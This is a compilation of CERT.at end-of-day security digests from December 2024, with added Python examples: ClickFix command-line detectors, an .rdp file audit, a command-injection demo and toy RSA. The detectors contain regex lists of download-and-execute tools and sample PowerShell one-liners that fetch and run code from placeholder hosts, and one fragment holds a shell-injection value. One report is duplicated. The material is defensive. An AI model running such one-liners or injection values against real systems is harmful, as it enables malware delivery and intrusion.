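    payload = "203.0.113.5; id"          # constructed attacker input
    print(shell_commands(build_ping_unsafe(payload)))   # two commands: ping and id
    print(shell_commands(build_ping_quoted(payload)))   # one command, odd argument
    try:
        build_ping_safe(payload)
    except ValueError as exc:
        print(exc)
```

Quoting stops the shell from splitting the string, but the hardened argv form is the one to prefer: it also removes the option-injection and environment-expansion cases that quoting alone does not address.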
∗∗∗ Juniper: 2024-12 Reference Advisory: Session Smart Router: Mirai malware found on systems when the default password remains unchanged ∗∗∗
---------------------------------------------
On Wednesday, December 11, 2024, several customers reported suspicious behavior on their Session Smart Network (SSN) platforms. These systems have been infected with the Mirai malware and were subsequently used as a DDOS attack source to other devices accessible by their network. The impacted systems were all using default passwords. Any customer not following recommended best practices and still using default passwords can be considered compromised as the default SSR passwords have been added to the virus database. [..] This affects all versions of Session Smart Router (SSR)
---------------------------------------------
https://supportportal.juniper.net/s/article/2024-12-Reference-Advisory-Sess…
∗∗∗ Foxit PDF Editor and Reader: attacks via crafted PDF files possible ∗∗∗
---------------------------------------------
Foxit's PDF applications are vulnerable on macOS and Windows. Security updates are available. [..] The severity rating of the vulnerabilities (CVE-2024-49576, CVE-2024-47810) is still pending.
---------------------------------------------
https://heise.de/-10211267
∗∗∗ Windows security solution Trend Micro Apex One as an entry point for attackers ∗∗∗
---------------------------------------------
Attackers can exploit several security vulnerabilities in Trend Micro Apex One. Security updates are available. [..] The vulnerabilities they close (CVE-2024-52048, CVE-2024-52049, CVE-2024-52050, CVE-2024-55631, CVE-2024-55632, CVE-2024-55917) are rated "high" severity.
---------------------------------------------
https://heise.de/-10213518
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (libsndfile, php:7.4, python3.11, python3.12, and python36:3.6), Debian (dpdk), Mageia (curl and socat), Oracle (firefox and tuned), Red Hat (bluez, containernetworking-plugins, edk2, edk2:20220126gitbb1bba3d77, edk2:20240524, expat, gstreamer1-plugins-base, gstreamer1-plugins-base and gstreamer1-plugins-good, gstreamer1-plugins-good, kernel, libsndfile, libsndfile:1.0.31, mpg123, mpg123:1.32.9, pam, python3.11-urllib3, skopeo, tuned, unbound, and unbound:1.16.2), SUSE (cloudflared, curl, docker, firefox, gstreamer-plugins-good, kernel, libmozjs-115-0, libmozjs-128-0, libmozjs-78-0, libsoup, ovmf, python-urllib3_1, subversion, thunderbird, and traefik), and Ubuntu (editorconfig-core, libspring-java, linux, linux-aws, linux-aws-6.8, linux-gcp, linux-gcp-6.8, linux-gke, linux-gkeop, linux-ibm, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-oem-6.8, linux-oracle, linux-oracle-6.8, linux-raspi, linux, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-ibm, linux-ibm-5.15, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-oracle, linux-oracle-5.15, linux-raspi, linux, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-kvm, linux-raspi, linux, linux-lowlatency, linux-oracle, linux-aws, linux-aws-5.15, linux-aws, linux-aws-5.4, linux-bluefield, linux-oracle, linux-oracle-5.4, and linux-oem-6.11).
---------------------------------------------
https://lwn.net/Articles/1002703/
=====================
= End-of-Day report =
=====================
Timeframe: Monday 16-12-2024 18:00 − Tuesday 17-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Consumer advice centre warns of current PayPal scam ∗∗∗
---------------------------------------------
The Verbraucherzentrale NRW warns that criminals are abusing "Pay without a PayPal account". There is hardly any protection against it. [..] At the centre of the criticism is a PayPal payment option called "Pay without a PayPal account", also known as "guest account" or "guest checkout". It lets buyers pay by direct debit without creating a PayPal account. An IBAN has to be provided for this.
---------------------------------------------
https://heise.de/-10202355
∗∗∗ Malicious ads push Lumma infostealer via fake CAPTCHA pages ∗∗∗
---------------------------------------------
DeceptionAds can be seen as a newer and more dangerous variant of the "ClickFix" attacks, where victims are tricked into running malicious PowerShell commands on their machine, infecting themselves with malware. ClickFix actors have employed phishing emails, fake CAPTCHA pages on pirate software sites, malicious Facebook pages, and even GitHub issues redirecting users to dangerous landing pages.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/malicious-ads-push-lumma-inf…
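ClickFix-style infections leave a characteristic trace: a command shell started from the Windows Run dialog (so its parent is explorer.exe) whose command line fetches remote content and evaluates it, often with window-hiding flags or a base64 -EncodedCommand. The following added example (the editor's detection logic, not from the BleepingComputer article, Guardio, or any vendor) scores simplified process-creation records on those features and expands encoded commands before matching. The records are constructed samples with placeholder hosts (example.invalid), not real telemetry, and the field names (parent, image, cmdline) are an assumption about the record shape.

```python
"""Flag process-creation records that look like ClickFix / fake-CAPTCHA executions.

Editor's example; sample records are constructed and use placeholder hosts.
"""
import base64
import re

DOWNLOAD = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
                      r"curl|wget|mshta|msiexec)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression|start-process|mshta)\b", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hid|-nop\b|-ep\s+bypass|\bbypass\b", re.I)
ENCODED = re.compile(r"-e(c|nc|ncodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
SHELLS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")


def decode_encoded_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the
    download/execute regexes can see it; leave the line alone if it is absent."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline + " " + decoded


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_record(rec: dict) -> dict:
    """Two or more independent indicators make a record suspicious."""
    raw = rec.get("cmdline", "")
    cmd = decode_encoded_command(raw)
    reasons = []
    if _basename(rec.get("image", "")) in SHELLS and _basename(rec.get("parent", "")) == "explorer.exe":
        reasons.append("shell spawned from explorer.exe (Run dialog / pasted command)")
    if DOWNLOAD.search(cmd) and EXECUTE.search(cmd):
        reasons.append("download-and-execute primitive")
    if HIDDEN.search(cmd):
        reasons.append("window hiding / policy bypass flags")
    if cmd != raw:
        reasons.append("encoded command expanded")
    return {"suspicious": len(reasons) >= 2, "reasons": reasons}


def sample_records() -> list:
    """Constructed records: two ClickFix-like, two benign."""
    ps = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    explorer = "C:\\Windows\\explorer.exe"
    encoded = base64.b64encode(
        "irm http://captcha.example.invalid/v.txt | iex".encode("utf-16-le")).decode()
    return [
        {"parent": explorer, "image": ps,
         "cmdline": 'powershell -w hidden -c "iwr http://captcha.example.invalid/verify.txt | iex"'},
        {"parent": explorer, "image": ps,
         "cmdline": "powershell.exe -nop -w hidden -enc " + encoded},
        {"parent": "C:\\Windows\\System32\\services.exe", "image": ps,
         "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
        {"parent": explorer, "image": ps, "cmdline": "powershell.exe"},
    ]


if __name__ == "__main__":
    for rec in sample_records():
        print(score_record(rec))
```

The two-indicator threshold is what keeps an interactive PowerShell started from the Start menu, or a scheduled script run with -ExecutionPolicy Bypass, below the line; tune the regexes to the lures seen locally rather than treating them as complete.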
∗∗∗ Over 25,000 SonicWall VPN Firewalls exposed to critical flaws ∗∗∗
---------------------------------------------
Over 25,000 publicly accessible SonicWall SSLVPN devices are vulnerable to critical severity flaws, with 20,000 using a SonicOS/OSX firmware version that the vendor no longer supports. [..] Public exposure means that the firewall's management or SSL VPN interfaces are accessible from the internet, presenting an opportunity for attackers to probe for vulnerabilities, outdated/unpatched firmware, misconfigurations, and brute-force weak passwords.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/over-25-000-sonicwall-vpn-fi…
∗∗∗ Security agency warns: kernel vulnerability in Windows is being actively exploited ∗∗∗
---------------------------------------------
Specifically, this concerns the vulnerability CVE-2024-35250, which allows attackers to escalate their privileges on vulnerable systems. According to the US cybersecurity agency CISA, there are now indications of active exploitation. [..] Patches for CVE-2024-35250 have been available since June for all affected operating systems and should therefore have been installed on most systems long ago.
---------------------------------------------
https://www.golem.de/news/sicherheitsbehoerde-warnt-kernel-schwachstelle-in…
∗∗∗ Python Delivering AnyDesk Client as RAT, (Tue, Dec 17th) ∗∗∗
---------------------------------------------
Yesterday, I found an interesting piece of Python script that will install AnyDesk on the victim’s computer. Even better, it reconfigures the tool if it is already installed. The script, called “an5.py” has a low VT score (6/63). Note that the script is compatible with Windows and Linux victims.
---------------------------------------------
https://isc.sans.edu/diary/rss/31524
∗∗∗ Technical Analysis of RiseLoader ∗∗∗
---------------------------------------------
In October 2024, Zscaler ThreatLabz came across malware samples that use a network communication protocol that is similar to RisePro. However, unlike RisePro which has primarily been used for information stealing, this new malware specializes in downloading and executing second-stage payloads. Due its distinctive focus and similarities with RisePro’s communication protocol, we named this new malware family RiseLoader.
---------------------------------------------
https://www.zscaler.com/blogs/security-research/technical-analysis-riseload…
∗∗∗ Earth Koshchei Coopts Red Team Tools in Complex RDP Attacks ∗∗∗
---------------------------------------------
APT group Earth Koshchei, suspected to be sponsored by the SVR, executed a large-scale rogue RDP campaign using spear-phishing emails, red team tools, and sophisticated anonymization techniques to target high-profile sectors.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/l/earth-koshchei.html
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (gstreamer1.0), Fedora (jupyterlab and python-notebook), Oracle (gimp:2.8.22, gstreamer1-plugins-base, gstreamer1-plugins-good, kernel, php:8.2, postgresql, and python3.11), SUSE (aws-iam-authenticator, firefox, installation-images, kernel, libaom, libyuv, libsoup, libsoup2, python-aiohttp, socat, thunderbird, and vim), and Ubuntu (curl, Docker, imagemagick, and kernel).
---------------------------------------------
https://lwn.net/Articles/1002496/
∗∗∗ CrushFTP: Attacken auf Admins möglich ∗∗∗
---------------------------------------------
Angreifer können in Logs von CrushFTP Schadcode verstecken. Dagegen gerüstete Versionen sind verfügbar.
---------------------------------------------
https://heise.de/-10202537
∗∗∗ Xen Security Advisory CVE-2024-53241 / XSA-466 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-466.html
∗∗∗ Xen Security Advisory CVE-2024-53240 / XSA-465 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-465.html
∗∗∗ Rockwell Automation PowerMonitor 1000 Remote ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-352-03
∗∗∗ Hitachi Energy TropOS Devices Series 1400/2400/6400 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-352-02
∗∗∗ ThreatQuotient ThreatQ Platform ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-352-01
∗∗∗ MISP v2.5.3 and v2.4.201 released with numerous enhancements, bug fixes, and security improvements to strengthen threat information sharing capabilities. ∗∗∗
---------------------------------------------
https://github.com/MISP/MISP/releases/tag/v2.5.3
∗∗∗ BD Diagnostic Solutions Products ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-352-01
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Monday 16-12-2024 18:00 − Tuesday 17-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Verbraucherzentrale warns of current PayPal scam ∗∗∗
---------------------------------------------
The Verbraucherzentrale NRW warns that criminals are abusing "Pay without PayPal account". There is hardly any way to protect against it. [..] At the centre of the criticism is a PayPal payment option called "Pay without PayPal account", also known as "guest account" or "guest payment". It lets buyers pay by direct debit without a PayPal account being created; all that has to be provided is an IBAN.
---------------------------------------------
https://heise.de/-10202355
∗∗∗ Malicious ads push Lumma infostealer via fake CAPTCHA pages ∗∗∗
---------------------------------------------
DeceptionAds can be seen as a newer and more dangerous variant of the "ClickFix" attacks, where victims are tricked into running malicious PowerShell commands on their machine, infecting themselves with malware. ClickFix actors have employed phishing emails, fake CAPTCHA pages on pirate software sites, malicious Facebook pages, and even GitHub issues redirecting users to dangerous landing pages.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/malicious-ads-push-lumma-inf…
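ClickFix and DeceptionAds end with the victim pasting a PowerShell one-liner into the Run box or a terminal, so the command line itself is the artefact worth hunting. The following triage script is an added example written for this digest; it is not code from the BleepingComputer article or from the original page. The indicator list is an assumption based on what such one-liners commonly contain (hidden window, execution-policy bypass, download cradle piped into Invoke-Expression, an -EncodedCommand payload), and the sample records are constructed to look like values stored under HKCU\...\Explorer\RunMRU.

```python
"""Triage of Run-box / shell command lines for ClickFix-style PowerShell lures.

Added example for this digest; not code from the original page or the cited
article. Indicator list and sample records are assumptions / constructed.
"""
import base64
import re
from typing import Dict, List, Optional

# Each indicator: (name, regex). Case-insensitive; covers the PowerShell
# aliases (iwr, irm, iex) that lures use to keep the pasted text short.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("encoded_command", re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("policy_bypass", re.compile(r"-e(?:p|xecutionpolicy)\s+bypass|-nop(?:rofile)?\b", re.I)),
    ("download_cradle", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", re.I)),
    ("inline_eval", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("lolbin_launcher", re.compile(r"\b(?:mshta|msiexec|certutil|bitsadmin)\b", re.I)),
    ("remote_url", re.compile(r"https?://", re.I)),
]
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_cmdline(cmd: str, min_hits: int = 2) -> Dict[str, object]:
    """Score one command line. The decoded payload is scanned too, because
    lures hide the cradle inside -enc so the visible text looks harmless."""
    hits = {name for name, rx in INDICATORS if rx.search(cmd)}
    decoded = decode_encoded_command(cmd)
    if decoded:
        hits |= {name for name, rx in INDICATORS if rx.search(decoded)}
    return {
        "cmd": cmd,
        "decoded": decoded,
        "indicators": sorted(hits),
        "suspicious": len(hits) >= min_hits,
    }


def triage_records(records: List[str]) -> List[Dict[str, object]]:
    """Return only the records that cross the threshold, in input order."""
    return [r for r in map(triage_cmdline, records) if r["suspicious"]]


def _encode_ps(script: str) -> str:
    # How PowerShell (and an attacker) builds an -EncodedCommand argument.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample in the shape of RunMRU values; example.invalid is a reserved name.
SAMPLE_RUNMRU = [
    "notepad.exe",
    'powershell -w hidden -nop -c "iwr https://example.invalid/x.txt | iex"',
    "mshta https://example.invalid/verify.hta",
    "powershell -enc " + _encode_ps("iex (irm https://example.invalid/p)"),
    "cmd /c echo hello",
]

if __name__ == "__main__":
    for r in triage_records(SAMPLE_RUNMRU):
        print(r["indicators"], "<-", r["cmd"][:60])
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

The threshold of two indicators keeps a lone `curl` or a lone URL from alerting; a single `mshta` pointed at a remote URL, or any hidden-window download cradle, still trips it. Feed it RunMRU values, PowerShell ScriptBlock logs or EDR process command lines in the same way.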
∗∗∗ Over 25,000 SonicWall VPN Firewalls exposed to critical flaws ∗∗∗
---------------------------------------------
Over 25,000 publicly accessible SonicWall SSLVPN devices are vulnerable to critical severity flaws, with 20,000 using a SonicOS/OSX firmware version that the vendor no longer supports. [..] Public exposure means that the firewall's management or SSL VPN interfaces are accessible from the internet, presenting an opportunity for attackers to probe for vulnerabilities, outdated/unpatched firmware, misconfigurations, and brute-force weak passwords.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/over-25-000-sonicwall-vpn-fi…
∗∗∗ Security agency warns: Windows kernel vulnerability is being actively exploited ∗∗∗
---------------------------------------------
Specifically, the vulnerability is CVE-2024-35250, which allows attackers to escalate their privileges on vulnerable systems. According to the US cybersecurity agency CISA, there are now indications of active exploitation. [..] Patches for CVE-2024-35250 have been available since June for all affected operating systems and should therefore have long since been installed on most systems.
---------------------------------------------
https://www.golem.de/news/sicherheitsbehoerde-warnt-kernel-schwachstelle-in…
∗∗∗ Python Delivering AnyDesk Client as RAT, (Tue, Dec 17th) ∗∗∗
---------------------------------------------
Yesterday, I found an interesting piece of Python script that will install AnyDesk on the victim’s computer. Even better, it reconfigures the tool if it is already installed. The script, called “an5.py” has a low VT score (6/63). Note that the script is compatible with Windows and Linux victims.
---------------------------------------------
https://isc.sans.edu/diary/rss/31524
∗∗∗ Technical Analysis of RiseLoader ∗∗∗
---------------------------------------------
In October 2024, Zscaler ThreatLabz came across malware samples that use a network communication protocol that is similar to RisePro. However, unlike RisePro which has primarily been used for information stealing, this new malware specializes in downloading and executing second-stage payloads. Due to its distinctive focus and similarities with RisePro’s communication protocol, we named this new malware family RiseLoader.
---------------------------------------------
https://www.zscaler.com/blogs/security-research/technical-analysis-riseload…
∗∗∗ Earth Koshchei Coopts Red Team Tools in Complex RDP Attacks ∗∗∗
---------------------------------------------
APT group Earth Koshchei, suspected to be sponsored by the SVR, executed a large-scale rogue RDP campaign using spear-phishing emails, red team tools, and sophisticated anonymization techniques to target high-profile sectors.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/l/earth-koshchei.html
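A rogue RDP campaign only works if the victim's client hands resources to the attacker's server, and those grants live as plain settings in the .rdp file. The audit below is an added example for this digest, not code from the Trend Micro report or the original page. It assumes the spear-phishing attachments are ordinary .rdp connection files; the list of risky settings is my own, taken from the documented .rdp file format rather than from the campaign write-up, the trusted-host suffix is a placeholder, and both sample files are constructed.

```python
"""Static audit of .rdp connection files for settings that hand the attacker
the victim's local resources.

Added example for this digest; not code from Trend Micro or the original page.
Risky-setting list and samples are my own / constructed.
"""
from typing import Dict, List, Sequence

# Assumption: hosts you actually operate RDP on. Anything else is untrusted.
TRUSTED_SUFFIXES: Sequence[str] = ("corp.example",)


def parse_rdp(text: str) -> Dict[str, str]:
    """An .rdp file is one 'name:type:value' per line; type is s, i or b."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        parts = raw.strip().split(":", 2)
        if len(parts) != 3:
            continue  # blank, comment or malformed line
        name, _type, value = parts
        settings[name.strip().lower()] = value.strip()
    return settings


def audit_rdp(settings: Dict[str, str],
              trusted_suffixes: Sequence[str] = TRUSTED_SUFFIXES) -> List[str]:
    """Return human-readable findings; an empty list means nothing notable."""
    findings: List[str] = []
    host = settings.get("full address", "")
    hostname = host.rsplit(":", 1)[0].lower() if host else ""
    if hostname and not hostname.endswith(tuple(trusted_suffixes)):
        findings.append(f"connects to untrusted host {host}")
    if settings.get("gatewayhostname"):
        findings.append(f"routes through RD Gateway {settings['gatewayhostname']}")
    # Resource redirection: the remote side can read and write whatever is redirected.
    if settings.get("drivestoredirect"):
        findings.append(f"redirects local drives: {settings['drivestoredirect']}")
    if settings.get("devicestoredirect"):
        findings.append(f"redirects devices: {settings['devicestoredirect']}")
    for key, what in (("redirectclipboard", "clipboard"), ("redirectprinters", "printers"),
                      ("redirectsmartcards", "smart cards"), ("redirectcomports", "COM ports")):
        if settings.get(key) == "1":
            findings.append(f"redirects {what}")
    # RemoteApp mode hides the remote desktop; the victim sees a single window.
    if settings.get("remoteapplicationmode") == "1":
        findings.append(
            f"RemoteApp mode, program={settings.get('remoteapplicationprogram', '?')}")
    # authentication level 0 connects even if the server certificate fails to verify.
    if settings.get("authentication level") == "0":
        findings.append("server authentication disabled (authentication level:i:0)")
    return findings


# Constructed samples; example.invalid / corp.example are placeholders.
ROGUE_RDP = """\
full address:s:rogue.example.invalid:3389
drivestoredirect:s:*
redirectclipboard:i:1
redirectsmartcards:i:1
remoteapplicationmode:i:1
remoteapplicationprogram:s:||Viewer
authentication level:i:0
"""

BENIGN_RDP = """\
full address:s:ts01.corp.example
authentication level:i:2
redirectclipboard:i:0
"""

if __name__ == "__main__":
    for label, text in (("rogue", ROGUE_RDP), ("benign", BENIGN_RDP)):
        print(label, audit_rdp(parse_rdp(text)) or "no findings")
```

Run it over .rdp attachments at the mail gateway, or over files mstsc.exe was launched with; a file that both points at an unknown host and redirects drives or smart cards deserves a block rather than a warning.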
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (gstreamer1.0), Fedora (jupyterlab and python-notebook), Oracle (gimp:2.8.22, gstreamer1-plugins-base, gstreamer1-plugins-good, kernel, php:8.2, postgresql, and python3.11), SUSE (aws-iam-authenticator, firefox, installation-images, kernel, libaom, libyuv, libsoup, libsoup2, python-aiohttp, socat, thunderbird, and vim), and Ubuntu (curl, Docker, imagemagick, and kernel).
---------------------------------------------
https://lwn.net/Articles/1002496/
∗∗∗ CrushFTP: attacks on admins possible ∗∗∗
---------------------------------------------
Attackers can hide malicious code in CrushFTP log files. Versions hardened against this are available.
---------------------------------------------
https://heise.de/-10202537
∗∗∗ Xen Security Advisory CVE-2024-53241 / XSA-466 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-466.html
∗∗∗ Xen Security Advisory CVE-2024-53240 / XSA-465 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-465.html
∗∗∗ Rockwell Automation PowerMonitor 1000 Remote ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-352-03
∗∗∗ Hitachi Energy TropOS Devices Series 1400/2400/6400 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-352-02
∗∗∗ ThreatQuotient ThreatQ Platform ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-352-01
∗∗∗ MISP v2.5.3 and v2.4.201 released with numerous enhancements, bug fixes, and security improvements to strengthen threat information sharing capabilities. ∗∗∗
---------------------------------------------
https://github.com/MISP/MISP/releases/tag/v2.5.3
∗∗∗ BD Diagnostic Solutions Products ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-352-01
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Friday 13-12-2024 18:00 − Monday 16-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Microsoft Update Catalog: critical vulnerability discovered in Microsoft's web server ∗∗∗
---------------------------------------------
Attackers were able to obtain elevated privileges on a Microsoft web server. Despite its promised transparency, the company gives no details.
---------------------------------------------
https://www.golem.de/news/microsoft-update-katalog-kritische-luecke-in-micr…
∗∗∗ Attacks on Citrix Netscaler Gateway: vendor gives advice on protection ∗∗∗
---------------------------------------------
Since December 2024 there have been massive waves of attacks on Citrix Netscaler Gateways. [..] Citrix has now responded and gives tips on how Netscaler Gateways can be protected against the attacks …
---------------------------------------------
https://www.borncity.com/blog/2024/12/15/angriffe-auf-citrix-netscaler-gate…
∗∗∗ 390,000 WordPress accounts stolen from hackers in supply chain attack ∗∗∗
---------------------------------------------
A threat actor tracked as MUT-1244 has stolen over 390,000 WordPress credentials in a large-scale, year-long campaign targeting other threat actors using a trojanized WordPress credentials checker.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/390-000-wordpress-accounts-s…
∗∗∗ The Simple Math Behind Public Key Cryptography ∗∗∗
---------------------------------------------
The security system that underlies the internet makes use of a curious fact: You can broadcast part of your encryption to make your information much more secure.
---------------------------------------------
https://www.wired.com/story/how-public-key-cryptography-really-works-using-…
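The article does not name a scheme, so here RSA serves as the concrete instance of "broadcast part of your key": (n, e) is published, d stays private, and recovering d from the public part means factoring n. This is an added example for this digest, not code from the Wired article or the original page. The primes are deliberately tiny so the factoring step finishes instantly; real keys use primes of roughly 1024 bits or more and a padding scheme (OAEP), without which RSA is not secure.

```python
"""Textbook RSA with toy numbers, to make the public/private split concrete.

Added example for this digest; not code from the Wired article or the page.
RSA is my choice of instance; numbers are tiny and there is no padding.
"""
from math import gcd, isqrt
from typing import Optional, Tuple

PublicKey = Tuple[int, int]    # (n, e): handed to everyone
PrivateKey = Tuple[int, int]   # (n, d): kept secret


def keygen(p: int, q: int, e: int) -> Tuple[PublicKey, PrivateKey]:
    """n = p*q is public; d = e^-1 mod phi(n) needs phi, i.e. needs p and q."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
    return (n, e), (n, d)


def encrypt(m: int, pub: PublicKey) -> int:
    n, e = pub
    if not 0 <= m < n:
        raise ValueError("message must be an integer in [0, n)")
    return pow(m, e, n)


def decrypt(c: int, priv: PrivateKey) -> int:
    n, d = priv
    return pow(c, d, n)


def recover_private_key(pub: PublicKey) -> Optional[PrivateKey]:
    """What an eavesdropper holding only (n, e) has to do: factor n.
    Trial division is fine for a toy n and shows where the cost explodes."""
    n, e = pub
    for p in range(2, isqrt(n) + 1):
        if n % p == 0:
            q = n // p
            return n, pow(e, -1, (p - 1) * (q - 1))
    return None


if __name__ == "__main__":
    pub, priv = keygen(61, 53, 17)   # n = 3233, phi = 3120, d = 2753
    c = encrypt(65, pub)             # 2790
    print(pub, priv, c, decrypt(c, priv))
    print(recover_private_key(pub))  # (3233, 2753): tiny n, trivially factored
```

Swap 61 and 53 for two 512-bit primes and `recover_private_key` no longer terminates in any useful time, while `keygen`, `encrypt` and `decrypt` stay instant; that asymmetry is the whole point of the article.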
∗∗∗ NodeLoader Exposed: The Node.js Malware Evading Detection ∗∗∗
---------------------------------------------
Zscaler ThreatLabz discovered a malware campaign leveraging Node.js applications for Windows to distribute cryptocurrency miners and information stealers. We have named this malware family NodeLoader, since the attackers employ Node.js compiled executables to deliver second-stage payloads, including XMRig, Lumma, and Phemedrone Stealer.
---------------------------------------------
https://www.zscaler.com/blogs/security-research/nodeloader-exposed-node-js-…
∗∗∗ Ignore the phishing message "Your account has been suspended" sent in Meta's name! ∗∗∗
---------------------------------------------
You receive a message from Meta telling you that your Facebook or Instagram account is about to be suspended. To prevent this, you must click a link and verify your account. But beware: this is a phishing message from criminals who want to steal your data!
---------------------------------------------
https://www.watchlist-internet.at/news/phishing-nachricht-im-namen-von-meta/
∗∗∗ Crypted Hearts: Exposing the HeartCrypt Packer-as-a-Service Operation ∗∗∗
---------------------------------------------
Analysis of packer-as-a-service (PaaS) HeartCrypt reveals its use in over 2k malicious payloads across 45 malware families since its early 2024 appearance.
---------------------------------------------
https://unit42.paloaltonetworks.com/packer-as-a-service-heartcrypt-malware/
∗∗∗ CoinLurker: The Stealer Powering the Next Generation of Fake Updates ∗∗∗
---------------------------------------------
The evolution of fake update campaigns has advanced significantly with the emergence of CoinLurker, a sophisticated stealer designed to exfiltrate data while evading detection. Written in Go, CoinLurker employs cutting-edge obfuscation and anti-analysis techniques, making it a highly effective tool in modern cyberattacks.
---------------------------------------------
https://blog.morphisec.com/coinlurker-the-stealer-powering-the-next-generat…
∗∗∗ Secure Coding: CWE 1123 – Avoid self-modifying code ∗∗∗
---------------------------------------------
The Common Weakness Enumeration entry CWE-1123 warns against excessive use of self-modifying code. Java developers should proceed with care.
---------------------------------------------
https://heise.de/-10194617
∗∗∗ CISA and EPA Warn: Internet-Exposed HMIs Pose Serious Cybersecurity Risks to Water Systems ∗∗∗
---------------------------------------------
The Cybersecurity and Infrastructure Security Agency (CISA) and the Environmental Protection Agency (EPA) have jointly released a crucial fact sheet highlighting the cybersecurity risks posed by Internet-exposed Human Machine Interfaces (HMIs) in the Water and Wastewater Systems (WWS) sector.
---------------------------------------------
https://thecyberexpress.com/exposed-human-machine-interfaces-in-wws/
∗∗∗ The Qualcomm DSP Driver - Unexpectedly Excavating an Exploit ∗∗∗
---------------------------------------------
This blog post provides a technical analysis of exploit artifacts provided to us by Google's Threat Analysis Group (TAG) from Amnesty International.
---------------------------------------------
https://googleprojectzero.blogspot.com/2024/12/qualcomm-dsp-driver-unexpect…
∗∗∗ Tech Guide: Detecting NoviSpy spyware with AndroidQF and the Mobile Verification Toolkit (MVT) ∗∗∗
---------------------------------------------
Amnesty Security Lab has published Indicators of Compromise (IOCs) for the NoviSpy spyware application. This tutorial explains how to use AndroidQF Android Quick Forensics (androidqf) and Mobile Verification Toolkit (MVT) to examine an Android device for traces of these indicators.
---------------------------------------------
https://securitylab.amnesty.org/latest/2024/12/tech-guide-detecting-novispy…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
